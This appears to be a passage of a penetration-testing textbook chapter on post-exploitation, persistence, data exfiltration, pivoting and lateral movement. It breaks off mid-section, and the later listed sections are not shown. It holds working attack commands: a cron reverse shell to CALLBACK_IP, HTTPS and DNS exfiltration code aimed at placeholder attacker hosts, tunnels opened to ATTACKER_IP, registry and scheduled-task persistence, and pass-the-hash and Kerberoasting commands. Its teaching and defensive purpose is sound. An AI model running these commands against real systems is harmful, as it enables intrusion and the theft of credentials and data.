In This Chapter
- Introduction: What Happens After the Shell
- 24.1 Post-Exploitation Objectives
- 24.2 Maintaining Access: Persistence Mechanisms
- 24.3 Data Exfiltration
- 24.4 Pivoting and Tunneling
- 24.5 Lateral Movement Strategies
- 24.6 Advanced Post-Exploitation Techniques
- 24.7 The MedSecure Post-Exploitation Scenario
- 24.8 Cleaning Up Responsibly
- 24.9 Post-Exploitation Reporting: Telling the Attack Story
- 24.10 Post-Exploitation in the ShopStack and Student Lab Environments
- 24.11 Anti-Forensics and Operational Security
- 24.12 Credential Harvesting Deep Dive
- 24.13 Ethical and Legal Considerations
- 24.14 The Penetration Test Kill Chain: Post-Exploitation in Context
- 24.15 Summary
- Review Questions
Chapter 24: Post-Exploitation and Pivoting
Introduction: What Happens After the Shell
You have obtained a shell on a target system during an authorized penetration test. Perhaps you exploited a vulnerable web application, leveraged a misconfigured service, or capitalized on a weak credential. The command prompt blinks, waiting for input. Now what?
This moment -- the transition from initial access to post-exploitation -- is where the real depth of a penetration test begins. Many aspiring ethical hackers invest enormous energy in learning exploitation techniques but give comparatively little thought to what follows. In reality, the post-exploitation phase is where the most consequential findings emerge, where the true impact of a vulnerability chain becomes clear, and where the difference between a superficial scan report and a transformative security assessment reveals itself.
Post-exploitation is the set of activities conducted after gaining initial access to a target system. These activities include escalating privileges, establishing persistent access, moving laterally through the network, exfiltrating data (in a controlled manner to demonstrate impact), and ultimately achieving the objectives defined in the engagement's rules of engagement. Pivoting, a closely related concept, refers to using a compromised system as a launching point to access other systems or network segments that were previously unreachable from the attacker's original position.
In the real world, advanced threat actors rarely stop at a single compromised host. The SolarWinds supply chain attack attributed to APT29 demonstrated how nation-state actors pivot from initial footholds through entire enterprise environments, moving from on-premises infrastructure to cloud systems with devastating effectiveness. Similarly, the 2022 Uber breach showed how even a teenager could leverage social engineering and post-exploitation techniques to pivot through internal systems using nothing more than Slack and a compromised VPN credential.
For the ethical hacker, post-exploitation serves a critical purpose: demonstrating the real-world impact of vulnerabilities. A SQL injection vulnerability that yields a low-privileged database user account might seem moderate in isolation. But if that account enables lateral movement to an Active Directory domain controller, which in turn provides access to sensitive patient records, the true severity becomes unmistakable. Post-exploitation transforms theoretical vulnerabilities into concrete business risks.
Authorized Testing Only: Every technique described in this chapter must only be performed within the scope of a signed, written authorization agreement. Post-exploitation activities carry significant risk of disrupting production systems, triggering security alerts, and exposing sensitive data. Always coordinate with the client's security team and adhere strictly to the rules of engagement.
Blue Team Perspective: Understanding post-exploitation techniques is essential for defenders. By learning how attackers maintain access, move laterally, and exfiltrate data, blue teams can implement detection mechanisms, segment networks effectively, and develop incident response playbooks that address real threat behaviors rather than theoretical attack models.
24.1 Post-Exploitation Objectives
Post-exploitation is not aimless exploration. Professional penetration testers approach this phase with clear objectives that align with the engagement scope and the client's security concerns. Understanding these objectives provides structure to what might otherwise become an unfocused wandering through compromised systems.
24.1.1 Situational Awareness
The first task after gaining access is understanding the compromised environment. This includes identifying the operating system and version, installed software, running processes, network configuration, logged-in users, and the system's role within the broader infrastructure.
On a Linux system, initial reconnaissance might look like this:
# System information
uname -a
cat /etc/os-release
hostname
# Network configuration
ip addr show
ip route show
cat /etc/resolv.conf
# Current user context
id
whoami
sudo -l
# Running processes
ps aux
# Installed packages (Debian/Ubuntu)
dpkg -l | head -50
# Scheduled tasks
crontab -l
ls -la /etc/cron.*
# Network connections
ss -tulpn
netstat -antup
On Windows, the equivalent commands include:
# System information
systeminfo
hostname
# Network configuration
ipconfig /all
route print
# Current user context
whoami /all
net user %username%
# Running processes
tasklist /v
wmic process list brief
# Installed software
wmic product get name,version
# Scheduled tasks
schtasks /query /fo list /v
# Network connections
netstat -ano
In MedSecure's penetration test scenario, after compromising a web server through a deserialization vulnerability, the tester discovers the server has dual network interfaces -- one connected to the DMZ (10.10.10.0/24) and another to an internal management VLAN (172.16.5.0/24). This discovery transforms a web server compromise into a potential gateway to the entire internal network.
24.1.2 Privilege Escalation
Initial access often comes with limited privileges. A web shell might run as the www-data user on Linux or IIS APPPOOL\DefaultAppPool on Windows. Privilege escalation -- obtaining higher-level access such as root or SYSTEM -- is frequently necessary to achieve engagement objectives.
Common privilege escalation vectors on Linux include:
- SUID binaries: Programs with the SUID bit set run with the file owner's privileges, often root. Misconfigured SUID binaries can be abused for escalation.
- Sudo misconfigurations: Users permitted to run specific commands via sudo without proper restriction can sometimes chain commands to obtain full root access.
- Kernel exploits: Unpatched kernels may contain vulnerabilities (such as Dirty Pipe, CVE-2022-0847) that allow privilege escalation.
- Writable cron jobs: If a scheduled task runs as root and references writable scripts or directories, an attacker can inject malicious code.
- Credential harvesting: Configuration files, history files, and environment variables may contain passwords or API keys.
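To make the SUID vector concrete: the setuid flag is just a bit in a file's mode, so it can be enumerated without special tooling. A minimal Python sketch (illustrative only; tools like LinPEAS perform a far more thorough version of this check):

```python
import os
import stat

def is_suid(mode: int) -> bool:
    """True if the setuid bit is set in a file mode."""
    return bool(mode & stat.S_ISUID)

def find_suid(root: str):
    """Walk a directory tree and yield paths of SUID regular files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries are skipped
            if stat.S_ISREG(st.st_mode) and is_suid(st.st_mode):
                yield path

# 0o4755 is the classic root-owned SUID mode (rwsr-xr-x)
print(is_suid(0o4755))   # True
print(is_suid(0o0755))   # False
```

In practice the equivalent one-liner is `find / -perm -4000 -type f 2>/dev/null`; the sketch simply shows what that test means at the file-mode level.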
On Windows, common vectors include:
- Unquoted service paths: Services with paths containing spaces and without quotes can be hijacked.
- Weak service permissions: If a low-privileged user can modify a service binary or configuration, they can escalate to SYSTEM.
- Token impersonation: Techniques such as Potato attacks (JuicyPotato, PrintSpoofer, GodPotato) abuse Windows token impersonation.
- AlwaysInstallElevated: A misconfigured Group Policy setting that allows any MSI to install with SYSTEM privileges.
- DLL hijacking: Applications that load DLLs from writable directories can be forced to load malicious code.
Tools like LinPEAS and WinPEAS automate the discovery of these vectors, but understanding the underlying mechanisms is essential for situations where automated tools are blocked or unavailable.
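To illustrate one of these vectors: when a service path contains spaces and is unquoted, Windows tries each space-delimited prefix as an executable before reaching the real binary. A short Python sketch that enumerates the hijack candidates (the service path shown is hypothetical):

```python
def hijack_candidates(image_path: str):
    """For an unquoted Windows service path containing spaces, list the
    executable names Windows would attempt before the intended binary."""
    if image_path.startswith('"'):
        return []  # properly quoted paths are not vulnerable
    parts = image_path.split(' ')
    # Every prefix short of the full path is a planting opportunity
    return [' '.join(parts[:i]) + '.exe' for i in range(1, len(parts))]

print(hijack_candidates(r'C:\Program Files\My App\svc.exe'))
# ['C:\\Program.exe', 'C:\\Program Files\\My.exe']
```

If a low-privileged user can write to any of those candidate locations, dropping a malicious `C:\Program.exe` yields code execution as the service account at next start.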
24.1.3 Information Gathering
Post-exploitation information gathering goes far beyond the initial reconnaissance performed before exploitation. With system-level access, the tester can access:
- Credential stores: SAM database (Windows), /etc/shadow (Linux), browser saved passwords, keychain entries, credential manager vaults
- Configuration files: Database connection strings, API keys, service account credentials, SSH keys
- Email and documents: Sensitive business documents, internal communications, intellectual property
- Active Directory data: Domain structure, Group Policy Objects, trust relationships, privileged accounts
- Network shares: File servers, backup locations, shared drives with sensitive data
Blue Team Perspective: Defenders should implement Data Loss Prevention (DLP) solutions, monitor for unusual file access patterns, and restrict unnecessary access to sensitive data stores. Credential hygiene practices -- including regular rotation, privileged access workstations, and credential tiering -- significantly increase the difficulty of post-exploitation information gathering.
24.1.4 Defining Success Criteria
Professional engagements define specific objectives, or "flags," that the testing team attempts to achieve. These might include:
- Accessing a specific database containing customer records
- Compromising a domain administrator account
- Reaching a segmented network (such as a PCI cardholder data environment)
- Demonstrating the ability to deploy (simulated) ransomware
- Exfiltrating synthetic test data past security controls
In MedSecure's engagement, the primary objective is demonstrating whether an external attacker can access patient health records stored in a segmented database environment. Every post-exploitation action should work toward this goal while remaining within the authorized scope.
24.2 Maintaining Access: Persistence Mechanisms
Persistence refers to techniques that allow continued access to a compromised system even after reboots, credential changes, or other disruptions. While persistence is a hallmark of real-world adversaries, ethical hackers must implement it judiciously -- only when explicitly authorized and always with documentation for later removal.
24.2.1 Why Persistence Matters in Testing
During multi-day engagements, maintaining access is a practical necessity. Re-exploiting a vulnerability each morning wastes time and may trigger additional security alerts. Persistence mechanisms allow the tester to resume work efficiently.
However, persistence introduces risk. Every backdoor or implant represents a potential vulnerability if discovered by an unauthorized party during the engagement. Testers must:
- Document every persistence mechanism installed
- Use unique, hard-to-guess authentication for implants
- Remove all persistence mechanisms during cleanup
- Encrypt communications between implants and command infrastructure
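The documentation requirement above benefits from even minimal tooling. A sketch of an engagement "persistence ledger" -- an append-only record of every implanted mechanism so cleanup misses nothing (the file path and field names are our own convention, not a standard):

```python
import json
import os
import tempfile
import time

def record_persistence(ledger_path, host, mechanism, artifact):
    """Append one installed persistence mechanism to the engagement
    ledger, so every implant can be located and removed at cleanup."""
    entry = {
        "timestamp": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "host": host,
        "mechanism": mechanism,
        "artifact": artifact,   # the exact path/key/task to remove later
        "removed": False,
    }
    with open(ledger_path, "a") as f:
        f.write(json.dumps(entry) + "\n")
    return entry

ledger = os.path.join(tempfile.gettempdir(), "engagement_ledger.jsonl")
entry = record_persistence(ledger, "web01", "ssh-key",
                           "/home/www-data/.ssh/authorized_keys")
print(entry["mechanism"])  # ssh-key
```

During cleanup (Section 24.8's concern), the team walks the ledger and flips each entry's "removed" flag only after verifying the artifact is gone.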
24.2.2 Linux Persistence Techniques
SSH Key Injection: Adding an authorized SSH key to a user's ~/.ssh/authorized_keys file provides quiet, encrypted access that blends with normal SSH traffic.
# Generate a dedicated key pair for the engagement
ssh-keygen -t ed25519 -f /tmp/pentest_key -N "" -C "pentest-engagement-2024"
# On the target, add the public key
mkdir -p ~/.ssh
chmod 700 ~/.ssh
echo "ssh-ed25519 AAAA... pentest-engagement-2024" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
Cron Job Persistence: A cron job can periodically execute a reverse shell or beacon.
# Create a cron job that runs every 15 minutes
(crontab -l 2>/dev/null; echo "*/15 * * * * /bin/bash -c 'bash -i >& /dev/tcp/CALLBACK_IP/443 0>&1'") | crontab -
Systemd Service: A custom systemd unit file provides persistence that survives reboots and can be configured to restart automatically.
# /etc/systemd/system/update-checker.service
[Unit]
Description=System Update Checker
After=network.target
[Service]
Type=simple
ExecStart=/opt/.update/beacon
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
Shared Library Hijacking (LD_PRELOAD): Injecting a malicious shared library via /etc/ld.so.preload causes every dynamically linked program to load the attacker's code.
24.2.3 Windows Persistence Techniques
Registry Run Keys: Adding entries to HKCU\Software\Microsoft\Windows\CurrentVersion\Run or the HKLM equivalent causes programs to execute at login.
# User-level persistence (no admin required)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdate" /t REG_SZ /d "C:\Users\Public\beacon.exe" /f
# System-level persistence (requires admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdate" /t REG_SZ /d "C:\Windows\Temp\beacon.exe" /f
Scheduled Tasks: Windows Task Scheduler provides sophisticated persistence options.
# Create a scheduled task that runs at logon
schtasks /create /tn "WindowsUpdate" /tr "C:\Users\Public\beacon.exe" /sc onlogon /ru SYSTEM
WMI Event Subscriptions: Windows Management Instrumentation (WMI) event subscriptions provide a stealthy persistence mechanism that does not leave obvious artifacts in common locations.
DLL Search Order Hijacking: Placing a malicious DLL in a directory searched before the legitimate DLL location causes applications to load the attacker's code.
Golden Ticket / Silver Ticket Attacks: In Active Directory environments, forging Kerberos tickets provides persistent access that survives password changes (until the KRBTGT password is changed twice for Golden Tickets).
Blue Team Perspective: Monitor for common persistence indicators: new scheduled tasks, registry Run key modifications, new services, unauthorized SSH keys, and unusual cron entries. Tools like Autoruns (Sysinternals), osquery, and EDR platforms can detect many persistence mechanisms. Implementing application whitelisting significantly reduces the effectiveness of persistence techniques.
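To illustrate the defender's side of this, a small Python sketch that scans crontab text for common reverse-shell indicators (the pattern list is illustrative, not exhaustive -- real detection belongs in an EDR or osquery pack):

```python
import re

# Heuristic indicators of reverse shells in cron entries (illustrative)
SUSPECT = [
    r"/dev/tcp/",      # bash network redirection
    r"\bnc\b.*-e\b",   # netcat with command execution
    r"bash -i",        # interactive shell invocation
    r"base64 -d",      # encoded stagers
]

def suspicious_cron_lines(crontab_text: str):
    """Return non-comment cron lines matching any suspect pattern."""
    hits = []
    for line in crontab_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        if any(re.search(p, line) for p in SUSPECT):
            hits.append(line)
    return hits

sample = ("*/15 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/443 0>&1'\n"
          "0 3 * * * /usr/bin/backup.sh")
print(suspicious_cron_lines(sample))  # flags only the first line
```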
24.2.4 Command and Control (C2) Frameworks
Professional penetration testers often use Command and Control (C2) frameworks to manage compromised hosts. These frameworks provide structured interfaces for commanding multiple implants, managing persistence, and executing post-exploitation modules.
Popular C2 frameworks in the ethical hacking community include:
- Cobalt Strike: Commercial framework widely used in professional penetration testing. Its Beacon implant supports multiple communication protocols and advanced evasion.
- Sliver: Open-source C2 framework developed by Bishop Fox. Supports mutual TLS, HTTP(S), DNS, and WireGuard communication.
- Mythic: Open-source, cross-platform C2 framework with a web-based interface and support for multiple agent types.
- Havoc: Modern, open-source C2 framework with a focus on evasion and flexibility.
- Metasploit Framework: While primarily an exploitation framework, Meterpreter provides robust post-exploitation capabilities.
The choice of C2 framework depends on engagement requirements, target environment, and the need to evade specific security controls. In environments with mature EDR solutions, the tester may need to customize implants or use less common frameworks to avoid detection.
24.3 Data Exfiltration
Data exfiltration -- the unauthorized transfer of data from a target environment -- is a critical objective for many real-world attackers and a common demonstration goal in penetration tests. Understanding exfiltration techniques helps testers demonstrate impact and helps defenders implement appropriate countermeasures.
24.3.1 Exfiltration Channels
Attackers and testers use various channels to extract data from compromised environments:
HTTP/HTTPS: Web traffic is almost always allowed outbound, making it the most common exfiltration channel. Data can be encoded in URL parameters, POST bodies, or custom headers.
import requests
import base64
# Simple HTTPS exfiltration (for demonstration purposes)
data = open("/path/to/sensitive_file", "rb").read()
encoded = base64.b64encode(data).decode()
# Chunked exfiltration to avoid large transfer detection
chunk_size = 1024
for i in range(0, len(encoded), chunk_size):
    chunk = encoded[i:i+chunk_size]
    requests.post("https://exfil-server.example.com/api/log",
                  json={"data": chunk, "seq": i // chunk_size},
                  verify=False)
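On the receiving side, the listener must reorder and reassemble the chunks before decoding. A minimal sketch matching the field names used above (sequence numbers also deduplicate retransmitted chunks):

```python
import base64

def reassemble(chunks):
    """Rebuild the original bytes from {'data': ..., 'seq': ...} records
    that may arrive out of order or be retransmitted."""
    deduped = {c["seq"]: c["data"] for c in chunks}  # last write wins
    encoded = "".join(data for _seq, data in sorted(deduped.items()))
    return base64.b64decode(encoded)

# Simulate two chunks arriving out of order
encoded = base64.b64encode(b"sensitive data").decode()
received = [{"seq": 1, "data": encoded[8:]},
            {"seq": 0, "data": encoded[:8]}]
print(reassemble(received))  # b'sensitive data'
```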
DNS: DNS queries are rarely blocked entirely, making DNS tunneling a reliable exfiltration method. Data is encoded in subdomain labels of DNS queries to an attacker-controlled authoritative DNS server.
# DNS exfiltration concept (using dig)
# Each query carries a small amount of data in the subdomain
data_chunk="$(echo 'sensitive data' | base64 | tr -d '=')"
dig "${data_chunk}.exfil.attacker-domain.com" TXT
Tools like dnscat2 and iodine automate DNS tunneling for both data exfiltration and interactive shell access.
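The encoding step these tools perform can be sketched in a few lines: data is base32-encoded (DNS names are case-insensitive, so base64 is unsafe) and split into labels of at most 63 characters, the limit imposed by RFC 1035. A round-trip illustration with a hypothetical exfiltration domain:

```python
import base64

MAX_LABEL = 63          # RFC 1035 limit for a single DNS label
CHUNK = MAX_LABEL - 4   # leave room for a short sequence-number prefix

def to_dns_queries(data: bytes, domain: str):
    """Encode bytes as base32 and emit one query name per chunk,
    each prefixed with a sequence number."""
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    return [f"{i}-{encoded[j:j + CHUNK]}.{domain}"
            for i, j in enumerate(range(0, len(encoded), CHUNK))]

def from_dns_queries(queries, domain: str) -> bytes:
    """Reassemble the payload on the authoritative-server side."""
    labels = []
    for q in queries:
        first = q[: -(len(domain) + 1)]    # strip ".domain"
        seq, chunk = first.split("-", 1)   # base32 never contains '-'
        labels.append((int(seq), chunk))
    encoded = "".join(c for _, c in sorted(labels)).upper()
    encoded += "=" * (-len(encoded) % 8)   # restore base32 padding
    return base64.b32decode(encoded)

queries = to_dns_queries(b"synthetic patient record", "exfil.example.com")
print(from_dns_queries(queries, "exfil.example.com"))
```

Real tools add error correction, encryption, and throttling on top of this scheme, but the label-encoding core is the same.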
ICMP: Data can be embedded in ICMP echo request/reply packets. While unusual ICMP traffic patterns may be detected, some environments do not inspect ICMP payload contents.
Cloud Storage: If the target environment has access to cloud storage services (AWS S3, Azure Blob, Google Cloud Storage), data can be uploaded to attacker-controlled storage buckets using legitimate cloud APIs that blend with normal traffic.
Email: Sending data via email (SMTP) is another exfiltration vector, particularly effective in environments where email is heavily used.
24.3.2 Staging and Compression
Before exfiltration, data is typically staged -- collected into a single location, compressed, and often encrypted to avoid content-based detection.
# Stage, compress, and encrypt data for exfiltration
# Create a staging directory
mkdir /tmp/.staging
# Copy target data
cp /var/www/app/config/database.yml /tmp/.staging/
cp /home/admin/.ssh/id_rsa /tmp/.staging/
# Compress and encrypt
tar czf - /tmp/.staging/ | openssl enc -aes-256-cbc -salt -pbkdf2 -out /tmp/.data.enc -pass pass:EngagementKey2024
# Clean up the staging directory (the encrypted archive at /tmp/.data.enc remains for transfer)
rm -rf /tmp/.staging/
24.3.3 Exfiltration Detection and Prevention
Blue Team Perspective: Implementing robust exfiltration detection requires a layered approach:
- Network monitoring: Analyze outbound traffic for unusual volumes, destinations, and protocols. Beaconing detection can identify regular, periodic communications typical of C2 and exfiltration tools.
- DNS monitoring: Monitor for unusually long DNS queries, high query volumes to single domains, and queries to newly registered domains.
- DLP solutions: Deploy Data Loss Prevention tools that inspect outbound traffic for sensitive data patterns (credit card numbers, social security numbers, medical record identifiers).
- Egress filtering: Restrict outbound traffic to necessary ports and protocols. Require proxy authentication for web traffic. Block direct DNS queries and force all DNS through monitored resolvers.
- Endpoint monitoring: EDR solutions can detect file staging activities, compression of sensitive directories, and use of common exfiltration tools.
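Beaconing detection, mentioned above, often reduces to a simple statistical test: C2 check-ins arrive at near-constant intervals, while human-driven traffic is bursty. A sketch of the idea (the 10% jitter threshold is an illustrative choice, not a standard):

```python
import statistics

def looks_like_beacon(timestamps, max_jitter_ratio=0.1):
    """Flag a series of connection times as beacon-like when the
    inter-arrival jitter is small relative to the mean interval."""
    if len(timestamps) < 4:
        return False  # too few samples to judge periodicity
    intervals = [b - a for a, b in zip(timestamps, timestamps[1:])]
    mean = statistics.mean(intervals)
    if mean <= 0:
        return False
    return statistics.pstdev(intervals) / mean <= max_jitter_ratio

# A C2 implant calling home every ~60 s vs. bursty human browsing
print(looks_like_beacon([0, 60, 120, 181, 240]))  # True
print(looks_like_beacon([0, 2, 90, 95, 400]))     # False
```

Production detections also account for deliberate sleep jitter that implants like Beacon add, typically by testing distributions rather than raw variance.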
In MedSecure's environment, the penetration tester creates a synthetic dataset mimicking patient record format (never using real patient data) and attempts to exfiltrate it through various channels. The tester discovers that while HTTPS exfiltration is blocked by the proxy's content inspection, DNS tunneling succeeds because the organization allows direct DNS queries to external resolvers -- a finding that leads to a critical recommendation in the final report.
24.4 Pivoting and Tunneling
Pivoting is perhaps the most technically fascinating aspect of post-exploitation. It transforms a single compromised host into a bridge that extends the attacker's reach into otherwise inaccessible network segments. Understanding pivoting is essential for both testers who need to demonstrate the full impact of network segmentation failures and defenders who need to understand how segmentation can be bypassed.
24.4.1 The Concept of Pivoting
Consider a typical corporate network architecture:
[Internet] --> [Firewall] --> [DMZ: Web Servers]
                                      |
                               [Internal FW]
                                      |
                              [Corporate LAN]
                                      |
                           [Segmented Networks]
                           /          |          \
                   [Dev/Test]    [Database]    [Management]
An attacker who compromises a web server in the DMZ cannot directly access the database segment. However, if the web server has network connectivity to the corporate LAN (perhaps for authentication or database queries), the attacker can use the web server as a pivot point to reach internal systems.
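Under the hood, every tunneling tool covered in this section reduces to the same primitive: accept a connection on the pivot host and shuttle bytes onward to an otherwise unreachable target. A minimal single-connection relay in Python (an illustration only -- real tools add encryption, multiplexing, and SOCKS negotiation):

```python
import socket
import threading

def pipe(src: socket.socket, dst: socket.socket):
    """Copy bytes one way until either side closes."""
    try:
        while (data := src.recv(4096)):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def relay(listen_port: int, target_host: str, target_port: int):
    """Accept one connection on the pivot, connect onward to the
    internal target, and shuttle bytes in both directions."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(1)
    client, _ = srv.accept()
    upstream = socket.create_connection((target_host, target_port))
    threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
    pipe(upstream, client)   # other direction runs in this thread
    client.close(); upstream.close(); srv.close()
```

Running `relay(8080, "172.16.5.100", 80)` on a pivot host (addresses hypothetical) would make the internal web server reachable on the pivot's local port 8080 -- conceptually the same thing `ssh -L` or `netsh portproxy` accomplish.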
24.4.2 SSH Tunneling
SSH tunneling is one of the most versatile pivoting techniques. If SSH access is available on a compromised host, the attacker can create tunnels that forward traffic through the SSH connection.
Local Port Forwarding: Forwards a port on the attacker's machine through the compromised host to a target on the internal network.
# Forward local port 8080 through pivot host to internal web server
ssh -L 8080:172.16.5.100:80 user@pivot-host
# Now accessing localhost:8080 reaches the internal web server
curl http://localhost:8080
Dynamic Port Forwarding (SOCKS Proxy): Creates a SOCKS proxy that allows routing arbitrary traffic through the pivot host.
# Create a SOCKS5 proxy on local port 1080
ssh -D 1080 user@pivot-host
# Use proxychains to route tools through the SOCKS proxy
proxychains nmap -sT -Pn 172.16.5.0/24
# Or configure individual tools
curl --socks5 localhost:1080 http://172.16.5.100
Remote Port Forwarding: Opens a port on the compromised host that forwards to a resource accessible from the attacker's machine.
# Open port 4444 on the pivot host, forwarding to attacker's port 443
ssh -R 4444:localhost:443 user@pivot-host
Multi-Hop Pivoting with SSH: Chaining SSH tunnels through multiple pivot points enables reaching deeply segmented networks.
# ProxyJump through multiple hosts
ssh -J user@pivot1,user@pivot2 user@final-target
# SSH config for persistent multi-hop setup
# ~/.ssh/config
Host pivot1
HostName 10.10.10.50
User admin
Host pivot2
HostName 172.16.5.20
User svc_admin
ProxyJump pivot1
Host target
HostName 192.168.100.10
User dbadmin
ProxyJump pivot2
24.4.3 Chisel: HTTP-Based Tunneling
Chisel is a fast TCP/UDP tunnel transported over HTTP, secured via SSH. It is particularly useful when SSH is not available on the pivot host but HTTP outbound connections are permitted.
Setting up Chisel:
# On the attacker's machine (server mode)
./chisel server --reverse --port 8443 --socks5
# On the compromised host (client mode)
./chisel client ATTACKER_IP:8443 R:socks
# This creates a SOCKS5 proxy on the attacker's machine
# that routes through the compromised host
proxychains nmap -sT -Pn 172.16.5.0/24
Chisel's advantages include:
- Single binary, no dependencies, cross-platform
- Traffic travels over HTTP/HTTPS, bypassing many firewalls
- Built-in SSH encryption layer
- Supports reverse tunneling (client initiates connection to server)
- Can tunnel through corporate proxies
24.4.4 Ligolo-ng: Advanced Pivoting
Ligolo-ng is a modern tunneling tool that creates a virtual network interface, allowing tools to interact with the target network as if directly connected. Unlike SOCKS-based solutions, Ligolo-ng supports all protocols, not just TCP.
Setting up Ligolo-ng:
# On the attacker's machine, start the proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
# On the compromised host, start the agent
./agent -connect ATTACKER_IP:11601 -ignore-cert
# In the Ligolo proxy interface:
# > session (select the agent session)
# > ifconfig (view target network interfaces)
# > start (start the tunnel)
# Add a route for the target network
sudo ip route add 172.16.5.0/24 dev ligolo
# Now tools work directly against the internal network
nmap -sV 172.16.5.0/24
Ligolo-ng's TUN-based approach offers significant advantages:
- Full protocol support (TCP, UDP, ICMP)
- No SOCKS proxy configuration required
- Tools work natively without proxychains
- Better performance than SOCKS-based solutions
- Support for multiple listeners (double pivoting)
24.4.5 Meterpreter Pivoting
Metasploit's Meterpreter provides built-in pivoting capabilities through the autoroute module and SOCKS proxy.
# In a Meterpreter session
meterpreter > run autoroute -s 172.16.5.0/24
meterpreter > background
# Start a SOCKS proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run
# Use proxychains with other tools
proxychains nmap -sT -Pn 172.16.5.0/24
24.4.6 Windows-Specific Pivoting
In Windows environments, additional pivoting techniques are available:
netsh Port Forwarding: Windows' built-in netsh command can create port forwards without additional tools.
# Forward port 8080 on the compromised host to internal target
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.100
# List existing port forwards
netsh interface portproxy show all
# Remove the forward
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
PuTTY/Plink: On Windows hosts with PuTTY installed, plink provides SSH tunneling capabilities.
# Remote port forward via plink: expose an internal web server to the attacker's machine
plink.exe -R 8080:172.16.5.100:80 user@attacker-host
SMB Named Pipes: In Active Directory environments, pivoting over SMB named pipes allows lateral movement using legitimate Windows protocols that blend with normal domain traffic.
24.4.7 Double and Triple Pivoting
Complex environments may require chaining pivots through multiple compromised hosts. This is conceptually similar to multi-hop SSH, but with tools like Chisel or Ligolo-ng:
Attacker --> Pivot1 (DMZ) --> Pivot2 (Corporate LAN) --> Target (Database Segment)
With Chisel, double pivoting requires running a Chisel server on Pivot1 and a Chisel client on Pivot2 that connects through Pivot1's tunnel. With Ligolo-ng, double pivoting is achieved by running a second listener within an established tunnel session and connecting a new agent through it.
Blue Team Perspective: Detect pivoting by monitoring for unusual internal traffic patterns. A web server in the DMZ suddenly initiating connections to numerous internal hosts on management ports is a strong indicator of compromise. Network segmentation should be enforced with deny-by-default rules, not just allowing traffic from the DMZ to specific internal services. Monitor for known tunneling tools (Chisel, Ligolo, plink) and unusual SSH connections from servers that normally do not initiate SSH sessions.
24.5 Lateral Movement Strategies
Lateral movement is the process of moving from one compromised system to other systems within the network. While pivoting establishes the network path, lateral movement involves actually authenticating to and gaining control of additional hosts.
24.5.1 Credential-Based Lateral Movement
The most common lateral movement technique leverages harvested credentials:
Pass-the-Hash (PtH): Windows NTLM authentication allows authenticating with a password hash rather than the plaintext password. If an attacker obtains NTLM hashes (from memory, SAM database, or network capture), they can authenticate to other systems without cracking the passwords.
# Pass-the-Hash with CrackMapExec
crackmapexec smb 172.16.5.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
# Pass-the-Hash with Impacket's psexec
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c Administrator@172.16.5.100
# Pass-the-Hash with evil-winrm
evil-winrm -i 172.16.5.100 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
Pass-the-Ticket (PtT): In Kerberos environments, captured or forged Kerberos tickets can be used for authentication.
# Export Kerberos tickets (Mimikatz)
sekurlsa::tickets /export
# Inject a ticket
kerberos::ptt ticket.kirbi
# Use Impacket with Kerberos
export KRB5CCNAME=/path/to/ticket.ccache
python3 psexec.py -k -no-pass target.domain.local
Overpass-the-Hash: Converting an NTLM hash into a Kerberos ticket, combining the simplicity of PtH with Kerberos authentication.
24.5.2 Remote Execution Methods
Once credentials are available, various remote execution methods can deploy commands or implants on target systems:
| Method | Protocol | Port | Requires Admin | Stealth Level |
|---|---|---|---|---|
| PsExec | SMB | 445 | Yes | Low (creates service) |
| WMI | DCOM/WMI | 135 | Yes | Medium |
| WinRM | HTTP(S) | 5985/5986 | Yes* | Medium |
| DCOM | DCOM | 135 | Yes | Medium-High |
| SMB Exec | SMB | 445 | Yes | Medium |
| SSH | SSH | 22 | Depends | High (encrypted) |
| RDP | RDP | 3389 | Yes* | Low (interactive) |
| PowerShell Remoting | WinRM | 5985/5986 | Yes* | Medium |
*May be available to non-admin users if specifically configured.
24.5.3 Active Directory Lateral Movement
Active Directory environments present unique lateral movement opportunities:
Kerberoasting: Requesting service tickets for accounts with Service Principal Names (SPNs) and cracking them offline to obtain plaintext passwords.
# Kerberoasting with Impacket
python3 GetUserSPNs.py domain.local/user:password -dc-ip 172.16.5.1 -request -outputfile kerberoast.txt
# Crack with hashcat
hashcat -m 13100 kerberoast.txt wordlist.txt
AS-REP Roasting: Targeting accounts that do not require Kerberos pre-authentication.
# AS-REP Roasting with Impacket
python3 GetNPUsers.py domain.local/ -dc-ip 172.16.5.1 -usersfile users.txt -format hashcat -outputfile asrep.txt
Unconstrained and Constrained Delegation: Abusing Kerberos delegation configurations to impersonate users and access services on their behalf.
Group Policy Preferences (GPP): Legacy Group Policy Preferences may contain encrypted credentials that can be trivially decrypted using the publicly known AES key.
ADCS (Active Directory Certificate Services) Abuse: Misconfigured certificate templates can be exploited to obtain certificates that enable authentication as any domain user, including domain administrators. The ESC1-ESC8 attack vectors discovered by SpecterOps researchers have become a major focus of Active Directory assessments.
24.5.4 Linux Lateral Movement
In Linux environments, lateral movement commonly leverages:
